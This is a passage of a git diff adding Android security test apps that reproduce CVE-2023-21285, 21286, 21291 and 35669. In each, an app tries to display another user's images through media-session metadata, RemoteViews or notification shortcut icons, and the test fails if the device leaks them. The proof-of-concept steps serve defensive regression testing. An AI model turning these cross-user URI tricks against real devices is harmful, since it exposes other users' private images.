+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21285">
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21285" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java
new file mode 100644
index 0000000..5a6dd58
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/src/android/security/cts/CVE_2023_21285/DeviceTest.java
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21285;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.media.MediaMetadata;
+import android.media.session.MediaController;
+import android.media.session.MediaSession;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.os.UserManager;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.IOException;
+import java.util.List;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testPocCVE_2023_21285() {
+        try {
+            // Get the user id of "cve_2023_21285_user" created in testPocCVE_2023_21285()
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = getInstrumentation().getContext();
+            int testUserId =
+                    SystemUtil.runWithShellPermissionIdentity(
+                            () -> {
+                                UserManager userManager =
+                                        context.getSystemService(UserManager.class);
+                                List<UserInfo> users = userManager.getUsers();
+                                int userId = -1;
+                                for (UserInfo user : users) {
+                                    if (user.name.equals("cve_2023_21285_user")) {
+                                        userId = user.id;
+                                        break;
+                                    }
+                                }
+                                return userId;
+                            },
+                            android.Manifest.permission.CREATE_USERS);
+            assumeTrue("Unable to find the user cve_2023_21285_user", testUserId != -1);
+
+            // Insert a placeholder content in the new user and query it to see if it has been
+            // inserted successfully
+            final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+            assumeTrue(
+                    "Failed to insert a placeholder content in the test user",
+                    poll(
+                            () -> {
+                                try {
+                                    SystemUtil.runShellCommand(
+                                            instrumentation,
+                                            String.format(
+                                                    "content insert --user %d --uri %s --bind "
+                                                            + "_display_name:s:cve_2023_21285.jpg",
+                                                    testUserId, imagesContentUri));
+                                    return SystemUtil.runShellCommand(
+                                                    instrumentation,
+                                                    String.format(
+                                                            "content query " + "--user %d --uri %s",
+                                                            testUserId, imagesContentUri))
+                                            .contains("Row");
+                                } catch (IOException e) {
+                                    Log.i("CVE-2023-21285", "Got an exception: " + e);
+                                }
+                                return false;
+                            }));
+
+            // Create a MediaSession
+            MediaSession session = new MediaSession(context, "cve_2023_21285_session");
+
+            // Create a separate handler thread
+            final HandlerThread handlerThread = new HandlerThread("cve_2023_21285_handlerThread");
+            handlerThread.start();
+
+            // Fetch uri from onMetadataChanged()
+            CompletableFuture<Boolean> uriReceived = new CompletableFuture<Boolean>();
+            session.getController()
+                    .registerCallback(
+                            new MediaController.Callback() {
+                                @Override
+                                public void onMetadataChanged(MediaMetadata metadata) {
+                                    uriReceived.complete(
+                                            metadata.getString(MediaMetadata.METADATA_KEY_ART_URI)
+                                                    == null);
+                                }
+                            },
+                            new Handler(handlerThread.getLooper()));
+
+            // Create MediaMetadata with 'uri' of cve_2023_21285_user and set metadata for 'session'
+            session.setMetadata(
+                    new MediaMetadata.Builder()
+                            .putString(
+                                    MediaMetadata.METADATA_KEY_ART_URI,
+                                    ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, testUserId)
+                                            .toString())
+                            .build());
+
+            // Fail the test if uri stored in 'METADATA_KEY_ART_URI' in mediaMetadata is not null
+            assertTrue(
+                    "Device is vulnerable to b/271851153, hence images"
+                            + " belonging to another user on the same device"
+                            + " can be displayed in MediaStyle notifications",
+                    uriReceived.get(5_000L /* timeout */, TimeUnit.MILLISECONDS));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp
new file mode 100644
index 0000000..c0e20ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21286",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml
new file mode 100644
index 0000000..ad513e9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21286">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21286" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml
new file mode 100644
index 0000000..abb85d3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+    android:id="@+id/cve_2023_21286_img"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml
new file mode 100644
index 0000000..e3588ce
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+    android:id="@+id/cve_2023_21286_outer"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java
new file mode 100644
index 0000000..55c75be
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java
@@ -0,0 +1,145 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21286;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    private AutoCloseable withAdoptShellPermissionIdentity(
+            UiAutomation uiAutomation, String permission) {
+        uiAutomation.adoptShellPermissionIdentity(permission);
+
+        // Remove permissions
+        return () -> uiAutomation.dropShellPermissionIdentity();
+    }
+
+    @Test
+    public void testPocCVE_2023_21286() {
+        UiDevice uiDevice = null;
+        try {
+            final String cveId = "cve_2023_21286_";
+            final String title = cveId + "title";
+
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            UiAutomation uiAutomation = instrumentation.getUiAutomation();
+            uiDevice = UiDevice.getInstance(instrumentation);
+            int userId = -1;
+
+            // Retrieve created user Id
+            try (AutoCloseable withAdoptShellPermissionIdentity =
+                    withAdoptShellPermissionIdentity(
+                            uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+                final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+                for (UserInfo info : list) {
+                    if (info.name.contains(cveId)) {
+                        userId = info.id;
+                        break;
+                    }
+                }
+            }
+            assumeTrue(userId != -1);
+
+            // Post a notification with a content view containing image from other user
+            RemoteViews rvPortrait =
+                    new RemoteViews(context.getPackageName(), R.layout.cve_2023_21286_layout);
+            rvPortrait.setImageViewUri(
+                    R.id.cve_2023_21286_img,
+                    Uri.parse("content://" + userId + "@media/external/images/media/"));
+            NotificationChannel notificationChannel =
+                    new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+            RemoteViews rvOuter =
+                    new RemoteViews(context.getPackageName(), R.layout.cve_2023_21286_layout_outer);
+            rvOuter.addView(R.id.cve_2023_21286_outer, rvPortrait);
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(notificationChannel);
+            Notification notification =
+                    new Notification.Builder(context, cveId)
+                            .setContentTitle(title)
+                            .setSmallIcon(
+                                    Icon.createWithData(
+                                            new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+                            .setCustomContentView(rvOuter)
+                            .setCustomBigContentView(rvOuter)
+                            .build();
+            try {
+                notificationManager.notify(0 /* id */, notification);
+            } catch (SecurityException securityException) {
+                if (securityException
+                        .getLocalizedMessage()
+                        .toLowerCase()
+                        .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+                    // Ignore exception thrown with fix and exit the test
+                    return;
+                } else {
+                    throw securityException;
+                }
+            }
+
+            // Open notification shade
+            assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+            // Wait for notification to appear and detect if the remote view is present
+            uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+            UiObject2 exposedImg =
+                    uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+            assertNull(
+                    "Device is vulnerable to b/277740082, Other user's images can be exposed in"
+                            + " notifications using remote views",
+                    exposedImg);
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                uiDevice.pressHome();
+            } catch (Exception e) {
+                // Ignore exceptions as the test has finished
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp
new file mode 100644
index 0000000..5b4d51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21291",
+    defaults: ["cts_support_defaults"],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "compatibility-device-util-axt",
+        "sts-device-util",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml
new file mode 100644
index 0000000..b5bd618
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21291">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+    <instrumentation
+            android:name="androidx.test.runner.AndroidJUnitRunner"
+            android:targetPackage="android.security.cts.CVE_2023_21291" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java
new file mode 100644
index 0000000..ee75317
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21291;
+
+import static android.Manifest.permission.CREATE_USERS;
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Person;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.service.notification.StatusBarNotification;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testPocCVE_2023_21291() {
+        try {
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            final UserManager userManager = context.getSystemService(UserManager.class);
+
+            // Check if the device supports multiple users or not
+            assumeTrue(
+                    "This device does not support multiple users",
+                    userManager.supportsMultipleUsers());
+
+            // Get the user id of "cve_2023_21291_user"
+            int testUserId =
+                    SystemUtil.runWithShellPermissionIdentity(
+                            () -> {
+                                List<UserInfo> list = userManager.getUsers();
+                                for (UserInfo info : list) {
+                                    if (info.toString().contains("cve_2023_21291_user")) {
+                                        return info.getUserHandle().getIdentifier();
+                                    }
+                                }
+                                return -1;
+                            },
+                            CREATE_USERS);
+            assumeTrue("Unable to find the user cve_2023_21291_user", testUserId != -1);
+
+            // Insert a placeholder content in the new user and query it to see if it has been
+            // inserted successfully
+            final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+            assumeTrue(
+                    "Failed to insert a placeholder content in the test user",
+                    poll(
+                            () -> {
+                                try {
+                                    SystemUtil.runShellCommand(
+                                            instrumentation,
+                                            String.format(
+                                                    "content insert --user %d --uri %s --bind "
+                                                            + "_display_name:s:cve_2023_21291.jpg",
+                                                    testUserId, imagesContentUri));
+                                    return SystemUtil.runShellCommand(
+                                                    instrumentation,
+                                                    String.format(
+                                                            "content query " + "--user %d --uri %s",
+                                                            testUserId, imagesContentUri))
+                                            .contains("Row");
+                                } catch (Exception e) {
+                                    Log.i("CVE-2023-21291", "Got an exception: " + e);
+                                }
+                                return false;
+                            }));
+
+            // Create notificationManager
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+
+            // Create notificationChannel
+            String channelId = "cve_2023_21291_channel_id";
+            notificationManager.createNotificationChannel(
+                    new NotificationChannel(
+                            channelId,
+                            "cve_2023_21291_channel_name" /* notification channel name */,
+                            NotificationManager.IMPORTANCE_DEFAULT));
+
+            // Post the Notification and check if any security exception is caught
+            try {
+                notificationManager.notify(
+                        0 /* notification id */,
+                        new Notification.Builder(context)
+                                .setChannelId(channelId)
+                                .setStyle(
+                                        new Notification.MessagingStyle(
+                                                        new Person.Builder()
+                                                                .setName("cve_2023_21291_person")
+                                                                .build())
+                                                .setShortcutIcon(
+                                                        Icon.createWithContentUri(
+                                                                ContentProvider.maybeAddUserId(
+                                                                        EXTERNAL_CONTENT_URI,
+                                                                        testUserId))))
+                                .setSmallIcon(
+                                        Icon.createWithData(
+                                                new byte[0] /* data */,
+                                                0 /* offset */,
+                                                0 /* length */))
+                                .build());
+            } catch (SecurityException securityException) {
+                if (securityException
+                        .getLocalizedMessage()
+                        .toLowerCase()
+                        .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+                    // Ignore exception thrown with fix and exit the test
+                    return;
+                } else {
+                    throw securityException;
+                }
+            }
+
+            // Check if notification gets posted or not, fail the test if notification gets posted
+            assertFalse(
+                    "Device is vulnerable to b/277593270 hence images belonging to another user on"
+                            + " the same device can be displayed in conversation notifications",
+                    poll(
+                            () -> {
+                                StatusBarNotification[] activeNotifications =
+                                        notificationManager.getActiveNotifications();
+                                for (StatusBarNotification notification : activeNotifications) {
+                                    if (notification
+                                            .getPackageName()
+                                            .equals(context.getPackageName())) {
+                                        return true;
+                                    }
+                                }
+                                return false;
+                            }));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp
new file mode 100644
index 0000000..ccb0a70
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-35669-target",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "target-app/src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    manifest: "target-app/AndroidManifest.xml",
+}
+
+android_test_helper_app {
+    name: "CVE-2023-35669-test",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "test-app/src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+        "compatibility-device-util-axt",
+    ],
+    manifest: "test-app/AndroidManifest.xml",
+    resource_dirs: [
+        "res",
+        "test-app/res",
+    ],
+    platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml
new file mode 100644
index 0000000..1dd7032
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml
@@ -0,0 +1,40 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <string name="accountName">TestAccount</string>
+    <string name="accountType">testevilaccount</string>
+    <string name="actionTarget">actionTarget</string>
+    <string name="activityTarget">android.security.cts.CVE_2023_35669_target.TargetActivity</string>
+    <string name="app_name">CVE_2023_35669</string>
+    <string name="bcastActionTarget">CVE_2023_35669_TargetActivity</string>
+    <string name="fieldName">mNonLocalizedLabel</string>
+    <string name="isVulnerable">isVulnerable</string>
+    <string name="launchTaskId">android.activity.launchTaskId</string>
+    <string name="msgFailure">Device is vulnerable to b/265798288 !!</string>
+    <string name="noExceptionMsg">no exception</string>
+    <string name="objectNotFound">%1$s account not found</string>
+    <string name="password">password</string>
+    <string name="pkgTarget">android.security.cts.CVE_2023_35669_target</string>
+    <string name="pocActivityStatus">status</string>
+    <string name="pocCrashedMsg">PocActivity crashed with exception: %s</string>
+    <string name="pocFailedMsg">pocActivity failed</string>
+    <string name="removeAccount">REMOVE ACCOUNT</string>
+    <string name="spannableString">A</string>
+    <string name="targetFailMsg">TargetActivity did not launch successfully</string>
+    <string name="taskId">taskId</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml
new file mode 100644
index 0000000..8188feb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+     http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_35669_target">
+
+    <application>
+        <activity
+            android:name=".TargetActivity"
+            android:exported="true" />
+    </application>
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java
new file mode 100644
index 0000000..d8c3536
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_target;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class TargetActivity extends Activity {
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+        sendBroadcast(
+                new Intent(getString(R.string.bcastActionTarget))
+                        .putExtra(getString(R.string.actionTarget), true)
+                        .putExtra(getString(R.string.taskId), getTaskId()));
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..ea24191
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml
@@ -0,0 +1,41 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
